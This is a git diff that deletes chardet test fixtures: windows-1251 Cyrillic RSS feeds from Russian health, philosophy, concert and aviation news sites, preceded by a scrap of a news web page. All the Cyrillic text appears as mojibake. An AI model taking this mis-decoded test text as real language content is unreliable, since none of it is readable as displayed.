-ׂמכךטם נאחךאחגא חא...<br /> - - - -ׂמכךטםמג ףםטגונסטעוע "ְנלוםוכמס" -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=117 - -ֱתכדאנסךטע מםכאים ׂמכךטם ףםטגונסטעוע ְנלוםוכמס, סתגלוסעום ןנמוךע םא ׀טם ֵםםמנ, ׂמכךטם ךכףב ךתל ִטנ.בד, ֱֳ ׂמכךטם פמנףלא ט הנףדט עמכךטםמגט מנדאםטחאצטט, שו מעגמנט גנאעט םא ... - - -3 םףאנט: םאחהנאגטצא -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=116 - -ֱנטעאםסךמעמ ׂמכךטם ־בשוסעגמ ךאםט גסטקךט ןמקטעאעוכט םא ֿנמפוסמנא הא גהטדםאע םאחהנאגטצא םא נמזהוםט לף הום, 3 םףאנט.<br /> -<br /> -ּאסמגטע עמסע ... - - -ׂמכךטם מבשוסעגמעמ ג ֱתכדאנט ג ׁןמךמ ןמ bTV -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=115 - -ׂמכךטם מבשוסעגמעמ ג ֱתכדאנט שו בתהו עולאעא םא לכאהוזךמעמ ןנוהאגאםו ׁןמךמ ןמ bTV עאחט סתבמעא (11.12.2004), מע 15:00 קאסא.<br /> -ו ףקאסעגאע פוםמגו םא ׂמכךטם מע ׁמפט, ֱףנדאס ט ׁעאנא ַאדמנא. - - -ׁתבמנ םא םמנגוזךטעו פוםמגו ןנוח כעמעמ. -http://www.rinennor.org/modules.php?op=modload&name=News&file=article&sid=114 - -ֿנוח כעמעמ פוםמגועו םא ׂמכךטם מע ֽמנגודט חא געמנט ןתע שו סו סתבונאע םא "ֵהםמ התכדממקאךגאםמ ןנאחםוםסעגמ" םא מסענמג ֻאםדמי. ֽא ןנאחםוםסעגמעמ סו םאבכדא םא ... - - - -
    -Warning: Unknown(): Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively. in Unknown on line 0
    diff --git a/chardet/tests/windows-1251-cyrillic/aif.ru.health.xml b/chardet/tests/windows-1251-cyrillic/aif.ru.health.xml deleted file mode 100644 index 448521c..0000000 --- a/chardet/tests/windows-1251-cyrillic/aif.ru.health.xml +++ /dev/null @@ -1,131 +0,0 @@ - - - - - - www.AIF.ru - ָםעונםוע-גונסט טחהאםט "ְטװ ַהמנמגו" - http://www.aif.ru/online/health - - - ְטװ ַהמנמגו - http://www.aif.ru/data/mags/health/button.gif - http://www.aif.ru/online/health - 88 - 31 - - - - אך ןונוזטע םמגמדמהם‏‏ םמק - http://www.aif.ru/online/health/592/11_01 - - ֽאגונםמו, והטםסעגוםםמו, גמ קעמ סודמהם למזםמ גונטע בוחמדמגמנמקםמ, עאך ‎עמ ג עמ, קעמ ֽמגי דמה מבחאעוכםמ םאסעףןטע. ֽוסלמענ םט םא קעמ! עמ םו ןנמסעמ מקונוהםמי ןנאחהםטך, ‎עמ - גוץא! ְ גוץט ג זטחםט ןנטםעמ מעלוקאע. ־עלוקאע רטנמךמ ט הוםךא ‎האך הגא-ענט... ָ גלוסעמ ןנמגמחדכאראולץ "םמגמדמ סקאסע" ט "םמגמדמ חהמנמג" ןנאחהםמגאםטו ֽמגמדמ דמהא ןנטםמסטע כטבמ םמגו במכקךט, כטבמ מבמסענוע סעאנו. ִאב ןמסעאנאעס טחבוזאע ןמהמבםמדמ פטםאכא כ‏בטלמדמ ןנאחהםטךא, ןנטגוהף םוסךמכךמ "ןנאחהםטקםץ" ןנאגטכ חאסעמכםמי בוחמןאסםמסעט. - - - ָהטעו ג באם‏! - http://www.aif.ru/online/health/592/03_01 - - עמ למזםמ הוכאע ג מןטכךאץ, ג לורךו ס בונוחמגלט כטסעלט טכט סוםמל. ֿאנטעס למזםמ, האזו חאנגרטס ג ןוסמך. אך ןנאגטכםמ ץמהטע ג באם‏, םאל נאססךאחגאוע גנאק-פטחטמעונאןוגע מעהוכוםט באכםומכמדטט לוהטצטםסךמדמ צוםענא "ֳףעא-כטםטך" כט ְ׀ְּׂ־ֽ־ְֲ. - - - ־ קול נאססךאזוע נואךצט לאםעף - http://www.aif.ru/online/health/592/05_01 - - ׀ואךצט ּאםעף - ‎עמ עףבונךףכטםמגא ןנמבא. ִכ ךאךמי צוכט מםא טחםאקאכםמ ןנוהםאחםאקאכאס? "׀ואךצט ּאםעף - ‎עמ מעגוע ךכועמקםמדמ טללףםטעועא ךאך דטןונקףגסעגטעוכםמסעט חאלוהכוםםמדמ עטןא םא סוםסטבטכטחאצט‏ מנדאםטחלא לטךמבאךעונטלט עףבונךףכוחא. ֿנוהםאחםאקוםא מםא הכ גגכוםט ג מנדאםטחלו גמחבףהטעוכ עףבונךףכוחא". (מלטעוע ןמ ךכועמקםמלף טללףםטעועף ט ףסעמיקטגמסעט ך טםפוךצטט, ֲ־ַ, 1965, 1970 דד.) ֿונגא גסענוקא ס לטךמבאךעונטלט עףבונךףכוחא ג ׀מססטט םאגחגאועס טסךףססעגוםםמ (!) ט לאססמגמ ג נמההמלאץ. - - - ׁ 3 המ 7 כוע. ׀אסעטל רוגוכ‏נף - http://www.aif.ru/online/health/592/06_01 - - "ּמוי הוגמקךו סךמנמ 5 כוע. ֵי ףזו באםעטךט םמסטע ץמקועס, םמ ץגמסעטךט הוכאע םו טח קודמ. ֿמהסךאזטעו, ג קול למזוע בע ןנטקטםא ט ךאךטו סנוהסעגא למדףע ןמלמק?" -ּ. ּ ו ק ם ט ך מ ג א, מסענמלא - - - ׁ 7 המ 12 כוע. ױמכמהטכםטך םא ךכ‏ק - http://www.aif.ru/online/health/592/06_02 - - "ּמזםמ כט מןנוהוכטע, טסעטםםמו ף נובוםךא מזטנוםטו טכט מם ןונווהאוע?" -ׂ. ְ ג ו נ ט ם א, ֵךאעונטםבףנד - - - ׁ 12 המ 16 כוע. ־ןאסםא למהא - http://www.aif.ru/online/health/592/06_03 - - "ׁךאזטעו, םאסךמכךמ מןאסםמ ץמהטע חטלמי ס מעךנעל זטגמעמל. ּמ המק דמגמנטע, קעמ מםא גסו ןנטךנגאוע ךףנעךמי, םמ גסו נאגםמ זו ץמכמהםמ... ִמךאחאע וי קעמ-כטבמ םוגמחלמזםמ." -ֲ. ׀., ׂמכעעט - - - ֿנאגטכא הכ זוכףהךא - http://www.aif.ru/online/health/592/07_01 - - ּםמדטו ןונטמהטקוסךט סענאהא‏ע מע םוסגאנוםט זוכףהךא, סמןנמגמזהא‏שודמס במכוגלט משףשוםטלט. ֿנטקטםא ‎עמדמ חאךכ‏קאועס םו עמכךמ ג עמל, קעמ כ‏הט והע םו עמ, קעמ םאהמ, םמ ט םו עאך, ךאך םאהמ, ט במכרו, קול םאהמ. ־סמבוםםמ קאסעמ עאךא ןנמבכולא גמחםטךאוע ןמסכו ןנאחהםטקםץ חאסעמכטי. ׳עמב םו המגמהטע זוכףהמך המ עאךמדמ סמסעמםט, ןמלםטעו םוסךמכךמ ןנמגונוםםץ גנולוםול ןנאגטכ. - - - ֽאסעףןכוםטו םא אםדטםף - http://www.aif.ru/online/health/592/08_01 - - מהםמלף טח םאטבמכוו נאסןנמסענאםוםםץ ןנמסעףהםץ חאבמכוגאםטי מעםמסטעס אםדטםא, טכט מסעני עמםחטככטע. עמלף מסענמלף טםפוךצטמםםמלף חאבמכוגאםט‏ ס ןמנאזוםטול לטםהאכטם (דכאםה) ןמהגונזום ךאך הועט, עאך ט גחנמסכו. ׳אשו גסודמ אםדטםא גמחםטךאוע טח-חא ןונומץכאזהוםט עוכא טכט מעהוכםץ ודמ קאסעוי, מסמבוםםמ םמד, םא פמםו סםטזוםט טללףםםמי חאשטע מנדאםטחלא, ןנט םוךאכמנטיםמל ןטעאםטט, ץנמםטקוסךמל סענוססו, ןונוףעמלכוםטט, םוהמסןאםטט. - - - ֲםטלאםטו םא ןמחגמםמקםטך - http://www.aif.ru/online/health/592/10_01 - - ־סעומץמםהנמח - המגמכםמ נאסןנמסענאםוםםמו חאבמכוגאםטו, ךמעמנמו נאחגטגאועס ף כ‏הוי כ‏במדמ גמחנאסעא. ֿנטקול ג ןמסכוהםוו גנול ג סגחט ס לאכמןמהגטזםל מבנאחמל זטחםט ט לםמדמקאסמגל סטהוםטול חא ךמלן‏עונמל מם חאלועםמ ןמלמכמהוכ. אך ןמךאחאכט טססכוהמגאםט, ןנמגוהוםםו ג ָםסעטעףעו םאעףנמןאעטט, ג ןנמפטכאךעטךו מסעומץמםהנמחא םאטבמכרטי ‎פפוךע מךאחגא‏ע לאססאז, כוקובםא דטלםאסעטךא, סאלמגעזוםטו רוט ט ןמחגמםמקםטךא, הטועא ט פטעמעונאןט. - - - ֽו סכטרךמל כט זטנםמ? - http://www.aif.ru/online/health/592/11_02 - - ֲבטנא םאטבמכוו ןמהץמהשטו הכ גאס גאנטאםע מעגועמג םא ךאזהי טח גמןנמסמג ‎עמדמ עוסעא, ג סלמזועו ג המסעאעמקםמי סעוןוםט מבתוךעטגםמ מןנוהוכטע - א םו "ןונובאנשטגאועו" כט ג ג סגמול ןטשוגמל נאצטמםו ס זטנאלט? - - - ָחכוקטל כט אכךמדמכטחל? - http://www.aif.ru/online/health/592/12_01 - - "אך ט הכ קודמ כ‏הט סמחהא‏ע סובו במכוחםט ט ןנמבכול? אך ןמלמק כ‏הל טחלוםטע סגמ‏ זטחם? ָ ךאך סהוכאע זטחם קוכמגוךא חהמנמגמי, סטכםמי ט סקאסעכטגמי?" ֿנאךעטךף‏שטי ןסטץמעונאןוגע, ןסטץמכמד ט דמלומןאע ֲאכונטי ֵָָֻֽֽׁ־ֲ ןעאועס םאיעט מעגוע םא ‎עט גמןנמס... ׁודמהם ל ןףבכטךףול דכאגף טח ךםטדט "ׂאים ןמהסמחםאםט", ג ךמעמנמי המךעמנ ׁטםוכםטךמג ןמלמדאוע ןמםע ןנטקטם עאךמי בוה, ךאך אכךמדמכטחל, ט ןמךאחגאוע ןףע טחבאגכוםט מע ‎עמי במכוחםט. - - - ִטועמכמדט ג גמןנמסאץ ט מעגועאץ - http://www.aif.ru/online/health/592/14_01 - - ׁודמהם םא גמןנמס קטעאעוכוי מעגוקאוע גנאק-הטועמכמד, המךעמנ לוהטצטםסךטץ םאףך ּטץאטכ ֱֳַָֽ׃׀ֳ. - - - ַאךאכול דמנכמ - http://www.aif.ru/online/health/592/15_01 - - ֲ <a href="http://www.aif.ru/online/health/591/04_01">ןנוההףשול םמלונו</a> ל נאססךאחאכט מ עמל, ךאך ןמגסטע ףסעמיקטגמסע ך ץמכמהף גמחהףץמןנמגמהשטץ ןףעוי םמסא, ךאך םףזםמ ןנאגטכםמ הראע םא למנמחו. ְ עוןונ - םוסךמכךמ סמגועמג, ךאך חאךאכטע דמנכמ. - - - ׁםטלאול ףעמלכוםטו - http://www.aif.ru/online/health/592/16_02 - - "ּום מקום ףעמלכ‏ע םו עמכךמ הכטעוכםו ןמוחהךט ג אגעמלמבטכו, םמ ט המכדטו סטהוםט םא נאחכטקםמדמ נמהא סמגושאםטץ ט סמבנאםטץ. ָ ושו בוסןמךמטע מבשוו ט םונגםמו םאןנזוםטו, א ג ןמסכוהםוו גנול - האזו דמכמגםו במכט. ׳עמ לםו למזוע ןמלמק?" -ָדמנ ׁ מ ל מ ג, ּמסךגא - - - ֲחהףכס זטגמע - http://www.aif.ru/online/health/592/16_04 - - "׳עמ ןמלמזוע ןנט גחהףעטט זטגמעא? ׳ול םאהמ ןטעאעס?" -ֵךאעונטםא ּ., ־נוכ - - - ּמזםמ כט ןונווסע גטעאלטםמג? - http://www.aif.ru/online/health/592/16_06 - - "־סום‏ ט חטלמי נוךמלוםהף‏ע ןטע במכרו גטעאלטםמג. ׁךאזטעו, א ך קולף למזוע ןנטגוסעט טץ ןונוטחבעמך?" -ֲ. ֲ ו כ ט ך מ ג, װנחוגמ - - - ׀אבמעא םאה מבנאחמל - http://www.aif.ru/online/health/592/10_02 - - ֽאגונםמו, םוע עאךמי זוםשטם, ךמעמנא םו ץמעוכא ב ץמנמרמ גדכהוע. ־סמבוםםמ ץמקועס ןמנאבמעאע םאה סגמטל מבנאחמל ןונוה ןנאחהםטךמל. ֽאסעמשוי ןאכמקךמי-גנףקאכמקךמי סעאםףע לאסךט טח םאעףנאכםץ ןנמהףךעמג. - - - - diff --git a/chardet/tests/windows-1251-cyrillic/anthropology.ru.xml b/chardet/tests/windows-1251-cyrillic/anthropology.ru.xml deleted file mode 100644 index 326899e..0000000 --- a/chardet/tests/windows-1251-cyrillic/anthropology.ru.xml +++ /dev/null @@ -1,176 +0,0 @@ - - - - - ְםענמןמכמדט - http://anthropology.ru/ru/ - ָםעונםוע-ןנמוךע «װטכמסמפסךא אםענמןמכמדט» - ru - - World/Russian/־בנאחמגאםטו/ִטסצטןכטם/װטכמסמפט/ - info@anthropology.ru - webmaster@anthropology.ru - - http://anthropology.ru/images/rssicon.gif - ָםעונםוע-ןנמוךע «װטכמסמפסךא אםענמןמכמדט» - http://anthropology.ru/ru/ - 88 - 31 - - - ֿמטסך - http://anthropology.ru/cgi-bin/search/search.cgi - q - ֿמכםמעוךסעמגי ןמטסך ןמ סאיעף «װטכמסמפסךא אםענמןמכמדט» - - 1440 - daily - 1 - 2000-01-01T12:00+03:00 - - ״וסעא בףההמכמדטקוסךא ךמםפונוםצט: עוחטס - http://anthropology.ru/ru/texts/gathered/buddha06/index.html - 2004-12-13 - ״וסעמי בףההמכמדטקוסךמי ךמםפונוםצטט»]]> - - - - װטכמסמפט מבנאחמגאםט - http://anthropology.ru/ru/texts/gathered/educphil/index.html - 2004-09-28 - װטכמסמפט מבנאחמגאםט»]]> - - - - - ָםםמגאצטט ט מבנאחמגאםטו - http://anthropology.ru/ru/texts/gathered/educinnov/index.html - 2004-09-28 - ָםםמגאצטט ט מבנאחמגאםטו»]]> - - - - ִטאכמד ג מבנאחמגאםטט - http://anthropology.ru/ru/texts/gathered/educdial/index.html - 2004-09-28 - ִטאכמד ג מבנאחמגאםטט»]]> - - - - ֲ הטאןאחמםו דףלאםטעאנםמדמ חםאםט - http://anthropology.ru/ru/texts/gathered/kagan/index.html - 2004-09-28 - ֲ הטאןאחמםו דףלאםטעאנםמדמ חםאםט»]]> - - - - - ׂנאהטצטט ט םמגאצטט ג סמגנולוםםץ פטכמסמפסךטץ הטסךףנסאץ - http://anthropology.ru/ru/texts/gathered/tradnov/index.html - 2004-09-12 - ׂנאהטצטט ט םמגאצטט ג סמגנולוםםץ פטכמסמפסךטץ הטסךףנסאץ»]]> - - - - װמנל סףבתוךעטגםמסעט ג פטכמסמפסךמי ךףכעףנו XX גוךא - http://anthropology.ru/ru/texts/gathered/subject/index.html - 2004-09-12 - ְ.ׁ. מכוסםטךמגא ט ׁ.ֽ. ׁעאגצוגא «װמנל סףבתוךעטגםמסעט ג פטכמסמפסךמי ךףכעףנו XX גוךא»]]> - - - - ׁעאעט ּ.ּ.׀ורועםטךמגא - http://anthropology.ru/ru/we/reshet.html - 2004-09-09 - ־סמבוםםמסעט סמסעמםט, ןמגוהוםט ט הועוכםמסעט כ‏הוי ג ‎ךסענולאכםץ סטעףאצטץ ס גטעאכםמי ףדנמחמי, ֽאבנמסךט ך ןסטץמכמדטקוסךמלף ןמנענועף עוננמנטסעא ט כטםטקוסךטי לועמה ג טחףקוםטט ט נאחנורוםטט לוזםאצטמםאכםץ ךמםפכטךעמג]]> - - - - - ׁעאעט ּ.ֲ.ֽטךמכאוגמי - http://anthropology.ru/ru/we/nikolaeva_mv.html - 2004-09-07 - ֿףע ֲמסעמךא», םא סאיעו נאחלושוםמ במכוו הגאהצאעט סעאעוי םארודמ םמגמדמ אגעמנא, ּ.ֲ.ֽטךמכאוגמי]]> - - - - ׁעאע «ׂנףה ט נאגםמןנאגטו: מבנאח נאבמעםטצ ג סמגועסךמי ןנוססו 1920-ץ דמהמג» - http://anthropology.ru/ru/texts/osika/worker.html - 2004-09-07 - .ֻ.־סטךט «ׂנףה ט נאגםמןנאגטו: מבנאח נאבמעםטצ ג סמגועסךמי ןנוססו 1920-ץ דמהמג»]]> - - - - ׁעאע «ֿמםעטו גממבנאזוםט ג פוםמלוםמכמדטט ֳףססונכ» - http://anthropology.ru/ru/texts/orlova/imaginatio.html - 2004-09-07 - .־.־נכמגמי «ֿמםעטו גממבנאזוםט ג פוםמלוםמכמדטט ֳףססונכ»]]> - - - - ׁעאעט ׁ.ֲ.ֿאץמלמגא - http://anthropology.ru/ru/we/pahomov.html - 2004-08-29 - ֿףע ֲמסעמךא», םא סאיעו נאחלושוםמ הוגע סעאעוי םארודמ םמגמדמ אגעמנא, ׁ.ֲ.ֿאץמלמגא]]> - - - - - ֿףע ֲמסעמךא IV: ןנמבכולא לועמהמג - http://anthropology.ru/ru/texts/gathered/east/04/index.html - 2004-08-29 - ֿףע ֲמסעמךא: ןנמבכולא לועמהמג]]> - - - - ֿףע ֲמסעמךא III: ענאהטצטט מסגמבמזהוםט - http://anthropology.ru/ru/texts/gathered/east/03/index.html - 2004-08-29 - ֿףע ֲמסעמךא: ענאהטצטט מסגמבמזהוםט]]> - - - - ׁבמנםטך סעאעוי «Homo philosophans» - http://anthropology.ru/ru/texts/gathered/sergeev/index.html - 2004-08-29 - «Homo philosophans», ןמסגש¸םםי 60-כועט‏ ןנמפ. .ְ.ׁונדווגא]]> - - - - - ֲגוהוםטו ג בףההמכמדט‏: ךףנס כוךצטי (ׂמנקטםמג ֵ.ְ.) - http://anthropology.ru/ru/texts/torchin/buddhism.html - 2004-08-09 - ֵ.ְ.ׂמנקטםמגא «ֲגוהוםטו ג בףההמכמדט‏»]]> - - - ױאיהודדונ ט גמסעמקםא פטכמסמפט: ןמטסךט גחאטלמהמןמכםטעוכםמסעט ךףכעףנ - http://anthropology.ru/ru/texts/gathered/heideast/index.html - 2004-08-09 - «ױאיהודדונ ט גמסעמקםא פטכמסמפט: ןמטסךט גחאטלמהמןמכםטעוכםמסעט ךףכעףנ»]]> - - - ׁבמנםטך סעאעוי «ְכוךסאםהנ ׁמךףנמג םא פטכמסמפסךמל פאךףכעועו» - http://anthropology.ru/ru/texts/gathered/sokurov/index.html - 2004-08-09 - «ְכוךסאםהנ ׁמךףנמג םא פטכמסמפסךמל פאךףכעועו»]]> - - - ׁבמנםטך סעאעוי «װטכמסמפט סעאנמסעט: דונמםעמסמפט» - http://anthropology.ru/ru/texts/gathered/gerontos/index.html - 2004-08-09 - «װטכמסמפט סעאנמסעט: דונמםעמסמפט»]]> - - - ֿאנאהטדל טסעמנטקוסךמדמ לרכוםט ױױ גוךא: מקונךט ןמ סמגנולוםםמי פטכמסמפטט ךףכעףנ - http://anthropology.ru/ru/texts/gathered/histpara/index.html - 2004-08-09 - ׁמכמםטםא .ֽ. ט ִףהםטךא ׁ.ָ. «ֿאנאהטדל טסעמנטקוסךמדמ לרכוםט ױױ גוךא: מקונךט ןמ סמגנולוםםמי פטכמסמפטט ךףכעףנ»]]> - - - - - diff --git a/chardet/tests/windows-1251-cyrillic/aug32.hole.ru.xml b/chardet/tests/windows-1251-cyrillic/aug32.hole.ru.xml deleted file mode 100644 index c64bf51..0000000 --- a/chardet/tests/windows-1251-cyrillic/aug32.hole.ru.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - ְפטרא ְׂ "32-ו ְגדףסעא" - http://aug32.hole.ru/ - ְפטרא ְׂ "32-ו ְגדףסעא" - - - 18.01.06 - <b>ִֵװֵׂ ׀ֵ׳ָ</b>. ׁמכםי ךמםצונע.<BR><I>ׁאםךע ֿועונבףנד. מםצונעםי חאכ ךםטזםמדמ לאדאחטםא "ֱףךגמוה". ֽא ןכ. ֲמססעאםט.</I> - http://aug32.hole.ru/afisha.htm - - - diff --git a/chardet/tests/windows-1251-cyrillic/aviaport.ru.xml b/chardet/tests/windows-1251-cyrillic/aviaport.ru.xml deleted file mode 100644 index 4c5c4ea..0000000 --- a/chardet/tests/windows-1251-cyrillic/aviaport.ru.xml +++ /dev/null @@ -1,289 +0,0 @@ - - - - - - ְגטאֿמנע.Ru - http://www.aviaport.ru - ְגטאצט טץ ןונגץ נףך - - http://www.aviaport.ru/images/aviaport_logo_yandex.gif - ְגטאֿמנע.Ru - http://www.aviaport.ru - - - - ֽאיהום עוכא הגףץ ןמדטברטץ ג אגטאךאעאסענמפו ןמה ױאנךמגמל - http://www.aviaport.ru/news/2006/01/02/99278.html - ֽא עוננטעמנטט ׃ךנאטם נאחבטכס סאלמכוע ס ענול קכוםאלט ‎ךטןאזא, גכועוגרטי טח ּמסךג. ׂוכא הגףץ ןמדטברטץ ןמהםע טח מחונא מלסמלמכסךמו, ךףהא ףןאכ סאלמכוע - Mon, 02 Jan 2006 17:25:00 +0300 - ֽא עוננטעמנטט ׃ךנאטם נאחבטכס סאלמכוע ס ענול קכוםאלט ‎ךטןאזא, גכועוגרטי טח ּמסךג. ׂוכא הגףץ ןמדטברטץ ןמהםע טח מחונא מלסמלמכסךמו, ךףהא ףןאכ סאלמכוע. אך סממבשאוע ךמננוסןמםהוםע אדוםעסעגא "ָםעונפאךס-׃ךנאטםא", ןמ ןנוהגאנטעוכםל האםםל, ‎עמ עוכא סע‏אנהוסס ט מהםמדמ טח ןטכמעמג. ִכ ןמהתולא סאלמכועא מזטהא‏ע ןנטבעטו נמססטיסךטץ סןוצטאכטסעמג. אך סממבשטכט "ָםעונפאךסף" ג ןנוסס-סכףזבו ּ׳ׁ ׀װ, ג ןמםוהוכםטך ג 11:16 ּׁ נואךעטגםי סאלמכוע בטחםוס ךכאססא ֱאו-125, גכועוגרטי טח "״ונולועוגמ-1", ףןאכ ג 3-4 ךטכמלוענאץ םוהאכוךמ מע א‎נמןמנעא ױאנךמגא. ֲ ּ׳ׁ המבאגטכט, קעמ קכום ‎ךטןאזא - דנאזהאםו ׀מססטט. ׁאלמכוע חאנודטסענטנמגאם ג מסענמגםמל דמסףהאנסעגו ְנףבא. ָח ױאנךמגא מם המכזום בכ המסעאגטע עףנטסעמג ג ְכן. ןמטסךמגל נאבמעאל ןנטגכוקום םאחולםא ןמטסךמגא דנףןןא א‎נמןמנעא "ױאנךמג", ןמהנאחהוכוםטו מןונאעטגםמ-סןאסאעוכםמי סכףזב ֳ׃ ּטם׳ׁ ג ױאנךמגסךמי מבכאסעט, גמהמכאח. ממנהטםאצט‏ ןמטסךמגמ-סןאסאעוכםץ נאבמע סמגונראוע ױאנךמגסךטי נודטמםאכםי ךממנהטםאצטמםםי צוםענ ֳמסףהאנסעגוםםמי אגטאצטמםםמי ןמטסךמגמ-סןאסאעוכםמי סכףזב ּטם׳ׁ ׃ךנאטם. - - - - - ֿמעמך ןאססאזטנמג קונוח א‎נמןמנע טלוםט ֱום-ֳףנטמםא גנמס םא 11% - http://www.aviaport.ru/news/2006/01/02/99277.html - ֲ 2005-ל דמהף קונוח א‎נמןמנע טלוםט ֱום-ֳףנטמםא ןנמרכט ןנטלונםמ 8,7 לטככטמםמג ןאססאזטנמג לוזהףםאנמהםץ ט םאצטמםאכםץ אגטאכטםטי. ֿנטנמסע ןמ סנאגםוםט‏ ס 2004 דמהמל סמסעאגטכ מךמכמ 11% - Mon, 02 Jan 2006 13:29:00 +0300 - ֲ סודמהםרםול םמלונו The Marker (‎ךמםמלטקוסךמו ןנטכמזוםטו ך דאחועו "ֳאאנוצ") בכט מןףבכטךמגאם האםםו מ נמסעו ןמעמךא ןאססאזטנמג קונוח א‎נמןמנע טלוםט ִאגטהא ֱום-ֳףנטמםא.ׁמדכאסםמ סגוהוםטל, ןנוהמסעאגכוםםל אהלטםטסענאצטוי א‎נמןמנעא, ג 2005-ל דמהף קונוח א‎נמןמנע טלוםט ֱום-ֳףנטמםא ןנמרכט ןנטלונםמ 8,7 לטככטמםמג ןאססאזטנמג לוזהףםאנמהםץ ט םאצטמםאכםץ אגטאכטםטי. ֿנטנמסע ןמ סנאגםוםט‏ ס 2004 דמהמל סמסעאגטכ מךמכמ 11%. ֿנטנמסע םא לוזהףםאנמהםץ אגטאכטםטץ סמסעאגטכ ןנטלונםמ 5,3% ןמ סנאגםוםט‏ ס ןנמרכל דמהמל.The Marker ןףבכטךףוע האםםו חא ענט םוהוכט טח זטחםט א‎נמןמנעא: 1-21 הוךאבנ א‎נמןמנע ןנטםכ ןנטלונםמ 360,7 עסק ןאססאזטנמג, קעמ םא 1,4% גרו ןנמרכמדמהםודמ ןמךאחאעוכ חא אםאכמדטקםי ןונטמה. ׳טסכמ ןנטבגרטץ ןאססאזטנמג לוזהףםאנמהםץ אגטאכטםטי סמסעאגטכמ ןנטלונםמ 176 עסק (ןנטנמסע םא 0,7%), קטסכמ גכועוגרטץ ןאססאזטנמג סמסעאגטכמ 164,5 עסק (ןנטנמסע םא 2,2%).׳עמ ךאסאועס גםףענוםםטץ אגטאכטםטי, 1-21 הוךאבנ קונוח א‎נמןמנע טלוםט ֱום-ֳףנטמםא ןנמרכט ןנטלונםמ 20,1 עסק ןאססאזטנמג, קעמ םא 1,7% גרו אםאכמדטקםמדמ ןמךאחאעוכ ג ןנוההףשול דמהף. ִגטזוםטו סאלמכועמג םא גםףענוםםטץ אגטאכטםטץ סמסעאגטכמ 428 גחכועמג ט ןמסאהמך (ןנטנמסע ג נאחלונו 3,6%). - - - - - ִכ עףרוםט ןמזאנמג ג ׁ״ְ ןנטגכוקום גונעמכוע ֽאצטמםאכםמי דגאנהטט - http://www.aviaport.ru/news/2006/01/02/99276.html - ֲ נהו רעאעמג ׁ״ְ בףרף‏ע כוסםו ןמזאנ. ִכ כטךגטהאצטט ןמזאנמג חאהויסעגף‏עס גונעמכוע ֽאצטמםאכםמי דגאנהטט רעאעא ׂוץאס - Mon, 02 Jan 2006 13:28:00 +0300 - ֲ נהו רעאעמג ׁ״ְ בףרף‏ע כוסםו ןמזאנ, סממבשטכט ןנוהסעאגטעוכט ןמזאנםמי סכףזב סענאם. ׂאך, מקאדט גמחדמנאםטי חאנודטסענטנמגאם ג רעאעאץ ־ךכאץמלא, ׂוץאס ט ֽ‏-ּוךסטךמ. ֿנט ‎עמל ןכמשאה מעהוכםץ ןמזאנמג םא דנאםטצו ׂוץאס ט ֽ‏-ּוךסטךמ המסעטדאוע 20 עס. דא. ִכ כטךגטהאצטט ןמזאנמג חאהויסעגף‏עס גונעמכוע ֽאצטמםאכםמי דגאנהטט רעאעא ׂוץאס. ־סםמגםלט ןנטקטםאלט כוסםץ ןמזאנמג, ןנמהמכזא‏שטץס ס ךמםצא הוךאבנ 2005 ד. ג נהו ‏דמ-חאןאהםץ נאימםאץ ׁ״ְ, גכ‏עס חאסףץא, אםמלאכםמ גסמךא הכ ‎עמדמ גנולוםט דמהא עולןונאעףנא גמחהףץא ט סטכםי גועונ, ןונוהאוע ְ׀. - - - - - ֽא במנעף פנאםצףחסךמדמ סאלמכועא זוםשטםא נמהטכא נובוםךא - http://www.aviaport.ru/news/2006/01/02/99275.html - ֽא במנעף ןאססאזטנסךמדמ סאלמכועא אגטאךמלןאםטט Air Austral, כועוגרודמ טח װנאםצטט םא מסענמג ׀ו‏םמם, זוםשטםא נמהטכא נובוםךא - Mon, 02 Jan 2006 13:25:00 +0300 - ֽא במנעף ןאססאזטנסךמדמ סאלמכועא אגטאךמלןאםטט Air Austral, כועוגרודמ טח װנאםצטט םא מסענמג ׀ו‏םמם, זוםשטםא נמהטכא נובוםךא. ּאכקטךא םאחגאכט ְכ-װאוה.עמ ןנמטחמרכמ ושו ג סףבבמעף. ֿמסכו גכועא טח ֻטמםא סע‏אנהוססא חאלועטכא, קעמ זוםשטםא סכטרךמל המכדמ סטהטע ג עףאכועו. ־םא ןמלמדכא ןנטםע נמה, א םאץמהטגרטיס םא במנעף גנאק ןונונוחאכ ןףןמגטםף.ׁאל ןמכוע ןנמהמכזאכס ןע קאסמג.ֿמ ןנאגטכאל אגטאןונוגמחמך, זוםשטם ס בונולוםםמסע‏ במכוו סולט לוסצוג ך ןמכועף םו המןףסךא‏עס. ׁמענףהםטךט אגטאךמלןאםטט ףעגונזהא‏ע, קעמ בונולוםםמסעט ף ‎עמי זוםשטם םו בכמ גטהםמ. - - - - - ֽא גמסעמךו ְגסענאכטט םובמכרמי סאלמכוע ףןאכ ג גמהמול - http://www.aviaport.ru/news/2006/01/02/99274.html - ֽא גמסעמךו ְגסענאכטט ףןאכ ג גמהף םובמכרמי מהםמלמעמנםי סאלמכוע, ןמכטצט ןמהעגונהטכא דטבוכ ןעט קוכמגוך. ֽא במנעף סאלמכועא Cessna-206 םאץמהטכטס סול קוכמגוך - Mon, 02 Jan 2006 13:24:00 +0300 - ֽא גמסעמךו ְגסענאכטט ףןאכ ג גמהף םובמכרמי מהםמלמעמנםי סאלמכוע, ןמכטצט ןמהעגונהטכא דטבוכ ןעט קוכמגוך, סממבשאוע אדוםעסעגמ ְססמרט‎יעוה ֿנוסס.ֿמ האםםל ןמכטצטט רעאעא גטםסכוםה, דהו ט ןנמטחמרוכ טםצטהוםע, םא במנעף סאלמכועא Cessna-206 םאץמהטכטס סול קוכמגוך - רוסע ןאססאזטנמג-ןאנאר‏עטסעמג ט ןטכמע. ִגא קוכמגוךא גזטכט, מםט דמסןטעאכטחטנמגאם, סממבשאוע ןמכטצט.׀אםוו סממבשאכמס מב מהםמל ןמדטברול.ׁאלמכוע ףןאכ ג גמהמול םוהאכוךמ מע דמנמהא ָןסףטק םא גמסעמךו רעאעא סנאחף זו ןמסכו גחכועא. ֿנטקטם ןנמטסרוהרודמ גסם‏עס. - - - - - אכטפמנםט: הגא קוכמגוךא ןמדטבכט ג נוחףכעאעו אגטאךאעאסענמפ - 